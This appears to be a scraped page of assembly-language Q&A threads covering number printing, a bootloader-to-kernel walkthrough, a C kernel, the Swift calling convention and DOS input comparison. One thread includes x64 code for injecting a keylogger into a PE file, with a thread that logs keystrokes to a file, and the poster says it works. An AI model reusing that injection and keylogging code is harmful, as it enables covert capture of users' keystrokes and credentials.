print number criticism in Nasm - numbers

I have written a "method" is Nasm 64bit mode. I just want some advise on how I could have done it better as I have just started coding in Nasm. For example is there a way to use less registers, or are my naming conventions horrible(they probably are!), is there a better way to print negative values, etc.
bits 64
section .text
global _start
_start:
;debugging
mov rbp, rsp
push -666 ;number I want to print
call _printVal ;calling the print "method"
;exit
mov rax, 1
mov rbx, 0
int 80h
_printVal:
;prolog
push rbp
mov rbp, rsp
;save registers
push rbx
push rdi
push rsi
;actual code
mov rax, [rbp + 16];get value user wants to print
mov rbx, 10 ;we will be dividing by the to get the last digit
xor rcx, rcx ; clear the rcx register as this will be out counter
cqo; extend the flag
cmp rdx, -1 ;check to see if negative
jne _divisionLoop;if not negative jump
;print negative sign
push 45;negative sign value
mov rax, 1; sys_write
mov rdi, 1; stdout
mov rsi, rsp ; address to what to print
mov rdx, 1 ; how many bytes is it
syscall
pop rax ;pop negative sign value from stack
mov rax, [rbp + 16]; get user value again
converting negative value to positive
dec rax
not rax
xor rcx, rcx; clear rcx because of syscall again
_divisionLoop:
xor rdx, rdx
div rbx ;divides number by 10 to move over last digit into rdx reg
push rdx ;pushes the remainder onto the stack
inc rcx ; count for how many digits added to stack
cmp rax, 0
jnz _divisionLoop ;jump if the division did not result in a zero
mov rax, 1; sys_write
mov rdi, 1; stdout
mov rdx, 1; 1 byte long
_printToScreenVal:
mov rsi, rsp; pop value from stack (most significant digit)
push rcx; (save rcx)
mov rcx, 48
add [rsi], rcx; add 48 to make it into ASCII value
syscall
pop rcx; get rcx register back
pop rbx; pop most siginificant digit
dec rcx; decrement how many more digits i have to print
jnz _printToScreenVal
;restore register
pop rsi
pop rdi
pop rbx
;epilog
pop rbp
ret

Related

How do I jump from my own bootloader to my own kernel?

I'm developing a homebrew os and I can't figure out how to switch from my homebrew bootloader to my homebrew kernel.
I do not know how it works
 I know it starts with memory, but I don't know what number it starts with
I've been told that I can just look at the minix source, but when I parse it from the iso, it doesn't tell me anything at all, all it tells me is the configuration of the linux directory.
I've been trying to figure it out for a week, but nothing has come up.
I'm sorry if I'm not trying hard enough.
And since there didn't seem to be any similar questions, I thought I'd ask you a question
I'll show you a well commented minimal example of jumping to a C++ kernel I wrote so maybe you can go from there and write your own. I work on Linux Ubuntu 20.
In your home directory create a folder named OS and create a file named kernel.cpp in that folder. Place the following content in that file:
void map_framebuffer(){
unsigned long* page_directory_table_pointer = (unsigned long*) 0xb018;
*page_directory_table_pointer = 0x1e00f;
unsigned long* page_table_pointer = (unsigned long*) 0x1e000;
/*
This is the actual address of the framebuffer in QEMU
for the video mode I set up in boot.asm.
In this case it is hardcoded. You may want to actually get this from the VBE structure.
The VBE structure is placed at 0x7e00 in memory by the boot.asm routine.
*/
unsigned long framebuffer_address = (unsigned long) 0xfd00000f;
for (unsigned int i = 0; i < 512; i++){
*page_table_pointer = framebuffer_address;
framebuffer_address += 0x1000;
page_table_pointer++;
}
}
void main(){
map_framebuffer();
/*
I made sure that the framebuffer is mapped to adress 0x600000 in the map_framebuffer() function.
You may want to identity map it instead or map it somewhere else. You'll then have to
calculate page table offsets and stuff.
*/
unsigned char* framebuffer_pointer = (unsigned char*)0x600000;
//Make a few pixels become white. Each pixel is 3 bytes RGB.
for (unsigned int i = 0; i < 10000; i++)
*(framebuffer_pointer + i) = 0xff;
asm volatile(
"halt:\n\t"
"hlt\n\t"
"jmp halt\n\t");
}
/*
Memory map of kernel
7e00 - 8000 -> VBE INFO structure
8000 - 9000 -> paging.bin (booting asm code)
9000 - a000 -> pml4
a000 - b000 -> pdpt
b000 - c000 -> pdt
1b000 - 1c000 -> pt1 (kernel identity mapped pages)
1c000 - 1d000 -> pt2 (kernel identity mapped pages)
1d000 - 1e000 -> pt3 (kernel identity mapped pages)
1e000 - 1f000 -> pt4 (mapped to the framebuffer, only 2MB are mapped to the framebuffer which could take more than this)
30000 - 80000 -> kernel.elf (temporary kernel file)
80000 -> kernel stack (growing downward)
*/
Now create a file named boot.asm in the same directory and write the following content into it:
org 0x7c00
bits 16
;Set the video mode to VBE graphics mode for being able to draw onto the screen
jmp get_vbe_info
error:
mov ah, 0x0e
mov al, 'e'
int 0x10
hlt
get_vbe_info:
mov ax, 0x4f01 ;c0 00 00 00
mov cx, 0x118
xor bx, bx
mov es, bx
mov di, 0x7e00
int 0x10
cmp ax, 0x004f
jne error
set_video_mode:
mov ax, 0x4f02
mov bx, 0x4118
int 0x10
cmp ax, 0x004f
jne error
;Set up a real mode stack
mov ax, 0x00
mov ss, ax
mov sp, 0x7c00
;Load the second stage bootloader at 0x8000
mov ah, 0x00 ;reset drive
int 0x13
xor ax, ax
mov es, ax
mov bx, 0x8000 ;es:bx = 0x0000:0x8000 = 0x8000
mov ah, 0x02 ;read sector function
mov al, 0x09 ;read 9 sectors
mov ch, 0x00 ;cylinder 0
mov dh, 0x00 ;head 0
mov cl, 0x02 ;start from sector 2
int 0x13
;Load the cpp kernel at 0x30000
mov ah, 0x00
int 0x13
mov ax, 0x3000
mov es, ax
xor bx, bx ;es:bx = 0x3000:0x0000 = 0x3000 * 0x10 + 0x0 = 0x30000
mov ah, 0x02 ;read sector function
mov al, 0x3c ;read 60 sectors to load the whole file
mov ch, 0x00 ;cylinder 0
mov dh, 0x00 ;head 0
mov cl, 0x0a ;start from sector 10 (because this is where lies the ELF CPP kernel in the disk.img we created with dd)
int 0x13
xor ax, ax
mov ds, ax
;Set up a protected mode stack
mov ax, 0x10 ;10000b = 10 for segment selector 2 (data)
mov ss, ax
mov sp, 0x7c00
cli
lgdt[gdtr]
;Enable protected mode
mov eax, cr0
or al, 1
mov cr0, eax
jmp 0x08:protectedMode ;0x08 = 1000b, 1 for segment selector
;0 for gdt not ldt and 00 for privilege
bits 32
protectedMode:
mov ax, 0x10
mov ds, ax
;Jump to 0x8000 (the second stage bootloader)
jmp 0x08:0x8000
gdt_start:
dq 0x0
gdt_code:
dw 0xFFFF ;limit 0-15
dw 0x0 ;base 0-15
db 0x0 ;base 16-23
db 10011010b ;pr, privi (2), s, ex, dc, rw, ac
db 11001111b ;gr, sz, limit 16-19
db 0x0 ;base 24-31
gdt_data:
dw 0xFFFF
dw 0x0
db 0x0
db 10010010b
db 11001111b
db 0x0
gdtr:
dw 24
dd gdt_start
times 510 - ($-$$) db 0
dw 0xAA55
Now create a third file named paging.asm and place the following into it:
org 0x8000
bits 32
;Set up paging
mov eax, 0x00009008
mov cr3, eax
pml4t:
mov dword [0x9000], 0x0000a00f
mov dword [0x9004], 0x0
pdpt:
mov dword [0xa000], 0x0000b00f
mov dword [0xa004], 0x0
pdt:
mov dword [0xb000], 0x0001b00f
mov dword [0xb004], 0x0
mov dword [0xb008], 0x0001c00f
mov dword [0xb00c], 0x0
mov dword [0xb010], 0x0001d00f
mov dword [0xb014], 0x0
pt:
mov edx, 0x3
mov eax, 0x200
mov ebx, 0x0000000f
mov ecx, 0x1b000
next_table:
next_entry:
mov dword [ecx], ebx
add ecx, 0x4
mov dword [ecx], 0x0
add ebx, 0x1000 ;add 4096 to the adress pointed to by ebx (the next physical page)
add ecx, 0x4
sub eax, 0x1
cmp eax, 0x0
jne next_entry
mov eax, 0x200
sub edx, 0x1
cmp edx, 0x0
jne next_table
mov eax, cr4 ;enable PAE-paging
or eax, 1 << 5
mov cr4, eax
mov ecx, 0xC0000080 ;set long mode bit in EFER MSR
rdmsr
or eax, 1 << 8
wrmsr
mov eax, cr0 ;enable paging
or eax, 1 << 31
mov cr0, eax
lgdt[gdtr] ;load a 64 bit gdt (will be ignored afterwards)
jmp 0x08:longMode
bits 64
longMode:
mov ax, 0x10 ;10000b = 10 for segment selector 2 (data)
mov ss, ax
mov rsp, 0x80000
mov rdi, 0x30000 ;address where elf reading occurs
mov rsi, 0x30000
add rdi, 24 ;program entry
mov rax, [rdi] ;placed in rax
add rdi, 8 ;program header table position
mov rbx, [rdi] ;put it in rbx
add rdi, 24 ;move to number of entries in program header
mov cx, [rdi] ;put it in cx (2 bytes)
mov rdi, 0x30000 ;beginning of file
add rdi, rbx ;go to program header 0
add rsi, rbx
next_segment:
mov edx, [rdi] ;put the type of segment in edx (4 bytes)
cmp edx, 0x1 ;determine if it is loadable
jne not_loadable ;if it isnt jump to not_loadable
add rdi, 0x8 ;else load it
mov r8, [rdi] ;put the offset in the file where data for this segment resides in r8
add rdi, 0x8 ;go to virtual address of segment
mov r9, [rdi] ;put it in r9
add rdi, 0x10 ;move to size of segment in file
mov r10, [rdi] ;put it in r10
add rdi, 0x8 ;move to size of segment in memory
mov r11, [rdi] ;put it in r11
mov rdi, 0x30000 ;move back to beginning of file
add rdi, r8 ;add segment offset to be at the segment position
next_byte:
mov dl, [rdi] ;put the byte at rdi in dl
mov [r9], dl ;move it to virtual address in r9
add r9, 0x1 ;add 1 byte to virtual address
add rdi, 0x1 ;add 1 byte to rdi
sub r10, 0x1 ;substract 1 byte from size of segment in file
sub r11, 0x1 ;substract 1 byte from size of segment in memory
cmp r10, 0x0 ;is segment finished
jne next_byte ;if not go to next_byte
cmp r11, 0x0 ;if yes tcheck memory size
je no_padding ;if no padding required jmp to no_padding
padding:
xor dl, dl
mov [r9], dl
add r9, 0x01
sub r11, 0x1
cmp r11, 0x0
jne padding
not_loadable:
no_padding:
sub cx, 0x1
cmp cx, 0x0
je finished
add rsi, 56
mov rdi, rsi
jmp next_segment
finished:
jmp rax ;Jump to the entry point of the ELF CPP file
halt:
hlt
jmp halt
;The 64-bits GDT
gdt_start:
dw 0xFFFF
dw 0
db 0
db 0
db 1
db 0
gdt_code:
dw 0x1111 ;limit 0-15
dw 0x0 ;base 0-15
db 0x0 ;base 16-23
db 10011010b ;pr, privi (2), s, ex, dc, rw, ac
db 10101111b ;gr, sz, limit 16-19
db 0x0 ;base 24-31
gdt_data:
dw 0x1111
dw 0x0
db 0x0
db 10010010b
db 00001111b
db 0x0
gdtr:
dw $ - gdt_start - 1
dq gdt_start
Now open a bash terminal and type the following commands in order (making sure to have NASM, g++ and QEMU installed):
nasm -fbin OS/boot.asm -oOS/boot.bin
nasm -fbin OS/paging.asm -oOS/paging.bin
g++ -static -ffreestanding -nostdlib -c -m64 OS/kernel.cpp -oOS/kernel.o
ld --entry main --oformat elf64-x86-64 --no-dynamic-linker -static -nostdlib OS/kernel.o -oOS/kernel.elf
dd if=/dev/zero of=OS/disk.img count=100 & dd if=OS/boot.bin of=OS/disk.img conv=notrunc & dd if=OS/paging.bin of=OS/disk.img seek=1 conv=notrunc & dd if=OS/kernel.elf of=OS/disk.img seek=9 conv=notrunc
qemu-system-x86_64 -hda OS/disk.img -s
You can always put all that in a bash file and launch it automatically. The -s in the QEMU command makes the virtual machine listen on port 1234. You can use gdb to debug the kernel. Type in gdb in a bash shell then target remote localhost:1234. You will then be debugging the machine. You can type dump memory result.bin 0x1000 0x2000 to dump the memory of the machine from 0x1000 to 0x2000 (or any address) in the file result.bin. You can use hexdump -C result.bin to look at the memory dump from terminal. The output is little endian so you need to reverse it for the actual values.
In the code above I'm loading the ELF file compiled with g++ to address 0x30000. Then I'm parsing the file and jumping to its entry point. The cpp code maps the framebuffer in virtual memory and makes a few pixels become white. The code is far from perfect but if you understand it in its entirety then you can go a long way.

C Kernel can't print string

I wrote a kernel to print hello world. but it's not working,
hello world is not printed.
assembly print is working well.
I using GCC and NASM for cross compile and assemble.
This is the my bootloader, second stage code and C code.
[ORG 0x00]
[BITS 16]
section .text
JMP 0x07C0:START ;
START:
mov ax, cs
mov ds, ax
mov es, ax
mov ax, 0x0000
mov ss, ax
mov ax, 0xffff
mov sp, ax
mov bp, ax
mov si, 0xB800
mov es, si
mov bx, 0x0000
mov cx, 80*25*2
CLEAR: ;Clear screen
mov byte[es:bx], 0x00
inc bx
loop CLEAR
READ: ;Read disk
mov si, 0x1000
mov es, si
mov bx, 0x0000 ; ES:BX, 0x1000:0000
mov ah, 0x02
mov al, 2
mov ch, 0
mov cl, 2
mov dh, 0
mov dl, 0
int 0x13
jnc A20_ENABLE ; No Error -> jump to A20_ENABLE
READERROR: ;If failed to read disk,
jmp $
A20_ENABLE: ;Enable A20 GATE with BIOS
mov ax, 0x2401
int 0x15
jnc ENTRY
A20_FAIL: ;If BIOS Interrupt is not working, use Control Port.
mov al, 2 ;
out 0x92, al
ENTRY: ;Entry Point
cli
lgdt [GDTR]
mov eax, cr0
or eax, 1
mov cr0, eax
jmp $+2 ; for pipeline
nop
nop
jmp dword 0x08:0x10000 ; jump to second stage
GDTR: ; GDT
dw GDTEND - GDT - 1
dd GDT+0x7C00
GDT:
NULL:
dw 0x00 ;프로세서 예약구간
dw 0x00
db 0x00
db 0x00
db 0x00
db 0x00
CODE:
dw 0xFFFF ;LIMIT ADRESS
dw 0x0000 ;BASE ADRESS
db 0x00 ;BASE ADRESS
db 0x9A ;1001 1010 A code segment descriptor (for your kernel, it should have type=0x9A)
db 0xCF ;1100 1111
db 0x00
DATA:
dw 0xFFFF
dw 0x0000
db 0x01
db 0x92 ;1001 0010 A data segment descriptor (you cant write to a code segment, so add this with type=0x92)
db 0xCF ;1100 1111
db 0x00
VIDEO:
dw 0xFFFF
dw 0x8000
db 0x0B
db 0x92
db 0x40
db 0x00
GDTEND:
times 510 - ($-$$) db 0x00
db 0x55
db 0xAA
Second stage.
[ORG 0x10000]
[BITS 32]
PROTECTED:
mov ax, 0x10
mov gs, ax
mov ss, ax
mov ds, ax
mov es, ax
mov fs, ax
xor esp, esp ; make stack
mov esp, 0xFFFE
mov ebp, 0xFFFE
mov si, 0x18 ; setting for print message
mov es, si
mov bx, 0
lea si, [message]
mov ah, 0x0f
MESSAGE: ; print loop
lodsb
cmp al, 0
je LOADKERNEL
mov [es:bx], ax
add bx, 2
jmp MESSAGE
LOADKERNEL:
jmp dword 0x08:0x10200 ; jump to C kernel
message: db 'Protected Mode Entered.', 0
times 512 - ($ - $$) db 0x00
and C code also.
void write_string();
void main(){
write_string(0x09, "helloworld");
}
void write_string( int colour, const char *string )
{
volatile char *video = (volatile char*)0xB8000;
while( *string != 0 )
{
*video++ = *string++;
*video++ = colour;
}
}
I converted C code to assembly with ld, gcc and objcopy.
gcc -c -m32 -ffreestanding kernel.c -o kernel.o
ld -melf_i386 -Ttext 0x10200 -nostdlib kernel.o -o kernel.tmp
objcopy -O binary kernel.tmp kernel.img
cat bootloader.img secondstage.img kernel.img > Disk
like this.
I really can't understand why it's not working.
If you need more information, plz leave a comment.

x86 Swift calling convention

I have the following Swift 4 code:
_ = self.tenArguments(one: 1, two: 2, three: 3, four: 4,
five: 5, six: 6, seven: 7, eight: 8,
nine: 9, ten: 10)
This compiles to:
0x100003247 <+87>: mov edx, 0x1
0x10000324c <+92>: mov edi, edx
0x10000324e <+94>: mov edx, 0x2
0x100003253 <+99>: mov esi, edx
0x100003255 <+101>: mov edx, 0x3
0x10000325a <+106>: mov r8d, 0x4
0x100003260 <+112>: mov ecx, r8d
0x100003263 <+115>: mov r8d, 0x5
0x100003269 <+121>: mov r9d, 0x6
0x10000326f <+127>: mov r10d, 0x7
0x100003275 <+133>: mov eax, r10d
0x100003278 <+136>: mov r10d, 0x8
0x10000327e <+142>: mov r11d, r10d
0x100003281 <+145>: mov r10d, 0x9
0x100003287 <+151>: mov ebx, r10d
0x10000328a <+154>: mov r10d, 0xa
0x100003290 <+160>: mov r14d, r10d
0x100003293 <+163>: mov r15, qword ptr [rip + 0x6dd6] ; (void *)0x00000001003a4048: swift_isaMask 0x10000329a <+170>: mov r12, qword ptr [rbp - 0x48]
I know x86_64 calling convention is RDI,RSI,RDX,RCX,R8,R9 but can anybody explain why the code above? Why is 0x1 loaded to edx first then moved to edi? This is then repeated for 0x2 to esi. Why has the compiler not generated:
mov edi, 0x1
mov esi, 0x2 ; etc...etc...
etc. Is this a speed optimisation by the compiler? Why double the number of ops?
This code was built by Xcode 8.3.2 for iPhone 7 simulator.

Why CreateThread dont work?

I am trying to inject this code in a PE file to run my program with CreateThread to run a keylogger in an PE file but CreateThread fails with 3E6h ERROR_NOACCESS error.
Where is my eerror in my source code below?
procedure:
sub rsp, 28h
and rsp, 0fffffffffffffff0h
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress
lea rbx,[pThread] ;
lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax
add rsp, 28h
db 0 ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [user32dll]
call rax
lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress
MOV [GETKEYS],RAX
Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress
lea rcx, [msvcrtdll]
call rax
lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax ;TO LOG KEYSTROKES
lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax ;TO LOG KEYSTROKES
lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress
mov rcx,[fp]
call rax
jmp REPS
endp
proc MyGetProcAddress
...
ret
endp
kernel32dll db 'KERNEL32.DLL', 0
loadlibrary7 db 'loadlibraryA', 0
user32dll db 'USER32.DLL', 0
createthread7 db 'CreateThread', 0
msvcrtdll db 'MSVCRT.DLL', 0
getasync db 'GetAsyncKeyState', 0
fopen7 db 'fopen_s', 0
fwrite7 db 'fwrite',0
fclose7 db 'fclose',0
exitproc7 db 'ExitProcess', 0
filemode db 'a',0
file_name db 'log',0
pThread dq 0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS dq 0
VIRTUAL_KEY_CODE dq 0
fp dq 0
Par dq 0
...
I already initialize my source:
mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax
And now my keylogger is working perfectly. Thank you for help me.

ASM Compare 2 Numbers

My task is to compare two numbers in ASM. I input the first number (binary) and the second (binary). I must compare Z1 and Z2. If Z1>=Z2, show TRUE, else show FALSE
dane segment
txt1 db 'First number: $'
txt2 db 'Secend number: $'
z1 dw 0
z2 dw 0
prawda db 'True!$'
falsz db 'False!$'
dane ends
sts segment stack
db 256 dup(?)
sts ends
program segment
assume cs:program, ss:sts, ds:dane
start:
mov ax, seg dane
mov ds,ax
mov dx, offset txt1
mov ah, 9
int 21h
mov cx, 16
mov bx, offset z1
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
mov cx, 16
mov ax, 0
mov bx, offset z1
petla2:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal1
add ax, 1
dal1:
inc bx
loop petla2
mov dx, offset txt2
mov ah, 9
int 21h
mov cx, 16
mov bx, offset z1
petla3:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla3
mov cx, 16
mov ax, 0
mov bx, offset z1
petla4:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal2
add ax, 1
dal2:
inc bx
loop petla4
;JGE, >= JNL not <
mov ax, [z1]
mov bx, [z2]
cmp ax,bx
jge ety
mov ah, 9
mov dx, offset falsz
int 21h
jae koniec
ety:
mov ah,9
mov dx, offset prawda
int 21h
koniec:
mov ah, 4ch
int 21h
program ends
end start
What I do wrong? It's my first assembler project
mov cx, 16
mov bx, offset z1
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
You didn't reserve the necessary memory for this operation! Z1 is defined as a word (2 bytes) and you are writing 16 bytes in this loop.
If you want to keep the basic structure of your program add the definition of a 16 byte buffer to recieve the binary representation of the number.
Buffer db 16 dup(0)
mov cx, 16
mov bx, offset Buffer
petla1:
mov ah, 1
int 21h
mov [bx], al
inc bx
loop petla1
mov cx, 16
mov ax, 0
mov bx, offset Buffer
petla2:
shl ax, 1
mov dl, [bx]
cmp dl, 31h
jne dal1
add ax, 1
dal1:
inc bx
loop petla2
mov [z1], ax
Do it similarly for the second number using the same Buffer but storing AX in z2.
Please note that the jae koniec should be an unconditional jump. jmp koniec